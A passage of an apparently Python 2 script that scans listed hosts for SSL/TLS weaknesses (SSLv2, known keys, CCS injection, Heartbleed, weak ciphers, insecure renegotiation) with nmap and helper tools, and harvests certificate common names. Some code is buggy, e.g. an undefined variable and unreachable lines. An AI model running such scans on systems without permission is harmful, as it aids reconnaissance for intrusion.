work_queue.put(job) 44 | 45 | result_queue = multiprocessing.Queue() 46 | worker = [] 47 | for i in range(num_processes): 48 | worker.append(Worker1(work_queue, result_queue)) 49 | worker[i].start() 50 | 51 | results = [] 52 | while len(results) < len(jobs): 53 | result = result_queue.get() 54 | results.append(result) 55 | results.sort() 56 | return (results) 57 | os.chdir(origPath) 58 | 59 | sslList=[] 60 | 61 | def runModules(quiet): 62 | #Start of Module 63 | results = "\n- Checking for SSLv2" 64 | print results 65 | jobs = [] 66 | jobid = 0 67 | 68 | for host in sslList: 69 | fullCmd = "nmap -sV -sC "+host[0]+" -p "+host[1] 70 | if quiet==False: 71 | print fullCmd 72 | jobs.append((jobid,host[0],fullCmd)) 73 | jobid = jobid+1 74 | resultsList = execute1(jobs,numProcesses) 75 | for i in resultsList: 76 | if "SSLv2 supported" in str(i): 77 | print line 78 | #End of Module 79 | 80 | #Start of Module 81 | results = "\n- Checking for Known SSL Keys" 82 | print results 83 | jobs = [] 84 | jobid = 0 85 | 86 | for host in sslList: 87 | fullCmd = "nmap --script ssl-known-key "+host[0]+" -p "+host[1] 88 | if quiet==False: 89 | print fullCmd 90 | jobs.append((jobid,host[0],fullCmd)) 91 | jobid = jobid+1 92 | resultsList = execute1(jobs,numProcesses) 93 | for i in resultsList: 94 | resultsList1 = i[2].split("\n") 95 | tempTitle = "" 96 | for line in resultsList1: 97 | line = line.strip() 98 | if "ssl-known-key" in line: 99 | print line 100 | #End of Module 101 | 102 | #Start of Module 103 | results = "\n- Checking for SSL ChangeCipherSpec flaw" 104 | print results 105 | jobs = [] 106 | jobid = 0 107 | 108 | for host in sslList: 109 | fullCmd = "python "+toolsPath+"/OSSL_CCS_InjectTest.py "+host[0]+" "+host[1] 110 | if quiet==False: 111 | print fullCmd 112 | jobs.append((jobid,host[0],fullCmd)) 113 | jobid = jobid+1 114 | resultsList = execute1(jobs,numProcesses) 115 | for i in resultsList: 116 | resultsList1 = i[2].split("\n") 117 | tempTitle = "" 118 | for line in resultsList1: 119 | line = line.strip() 120 | if "may allow early" in line: 121 | print line 122 | #End of Module 123 | 124 | #Start of Module 125 | results = "\n- Running Nmap Heartbleed Module" 126 | print results 127 | jobs = [] 128 | jobid = 0 129 | 130 | for host in sslList: 131 | fullCmd = "nmap -p "+host[1]+" --script ssl-heartbleed "+host[0] 132 | if quiet==False: 133 | print fullCmd 134 | jobs.append((jobid,host[0],fullCmd)) 135 | jobid = jobid+1 136 | resultsList = execute1(jobs,numProcesses) 137 | for i in resultsList: 138 | resultsList1 = i[2].split("\n") 139 | if "error" not in str(i).lower() and "filtered" not in str(i).lower(): 140 | for x in resultsList1: 141 | print x 142 | #End of Module 143 | 144 | #Start of Module 145 | results = "\n- Running Tlssled" 146 | print results 147 | jobs = [] 148 | jobid = 0 149 | 150 | for host in sslList: 151 | fullCmd = tlssledPath+"TLSSLed_v1.3.sh "+host[0]+" "+host[1] 152 | if quiet==False: 153 | print fullCmd 154 | jobs.append((jobid,host[0],fullCmd)) 155 | jobid = jobid+1 156 | resultsList = execute1(jobs,numProcesses) 157 | insecureSSLList=[] 158 | 159 | for i in resultsList: 160 | resultsList1 = i[2].split("\n") 161 | tempTitle = "" 162 | count=0 163 | 164 | for line in resultsList1: 165 | line = line.strip() 166 | if "Running sslscan on" in line: 167 | tempTitle = line 168 | count=1 169 | if "40 bits" in line or "56 bits" in line: 170 | if count==1: 171 | insecureSSLList.append(tempTitle) 172 | count=0 173 | insecureSSLList.append(line) 174 | if "Secure Renegotiation IS supported" in line: 175 | print "\n"+tempTitle 176 | print "- Secure SSL/TLS renegotiation" 177 | print line 178 | if "(CI) SSL/TLS renegotiation IS enabled" in line: 179 | print "- Insecure SSL/TLS renegotiation" 180 | print line 181 | if " SSLv3" in line and "CBC" in line: 182 | print line 183 | 184 | #End of Module 185 | print "\nWeak 40bits or 56bits TLS/SSL Ciphers" 186 | for item in insecureSSLList: 187 | print item 188 | 189 | #Start of Module 190 | results = "\n- Getting Common Names from SSL Certificates" 191 | print results 192 | jobs = [] 193 | jobid = 0 194 | 195 | for host in sslList: 196 | fullCmd = "nmap --script=ssl-cert -p "+host[1]+" "+host[0] 197 | if quiet==False: 198 | print fullCmd 199 | jobs.append((jobid,host[0],fullCmd)) 200 | jobid = jobid+1 201 | resultsList = execute1(jobs,numProcesses) 202 | print "\n" 203 | for i in resultsList: 204 | resultsList1 = i[2].split("\n") 205 | for x in resultsList1: 206 | if "| ssl-cert: Subject: commonName=" in x and "*." not in x: 207 | hostName = x.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 208 | print host[0]+"\t"+hostName 209 | #End of Module 210 | 211 | if __name__ == '__main__': 212 | parser = argparse.ArgumentParser() 213 | parser.add_argument('-quiet', action='store_true', help='[only show results]') 214 | parser.add_argument('-file', dest='filename', action='store', help='[file containing IPs and Ports]') 215 | parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]') 216 | 217 | if len(sys.argv)==1: 218 | parser.print_help() 219 | sys.exit(1) 220 | 221 | options = parser.parse_args() 222 | if options.numProcesses: 223 | numProcesses=int(options.numProcesses) 224 | else: 225 | numProcesses=int(10) 226 | if not options.filename: 227 | parser.print_help() 228 | sys.exit(1) 229 | else: 230 | with open(options.filename) as f: 231 | for line in f: 232 | line = line.strip() 233 | line1 = line.split(":") 234 | hostNo = line1[0] 235 | hostPort = line1[1] 236 | sslList.append((hostNo,hostPort)) 237 | 238 | if options.quiet: 239 | runModules(quiet=True) 240 | else: 241 | runModules(quiet=False) 242 | --------------------------------------------------------------------------------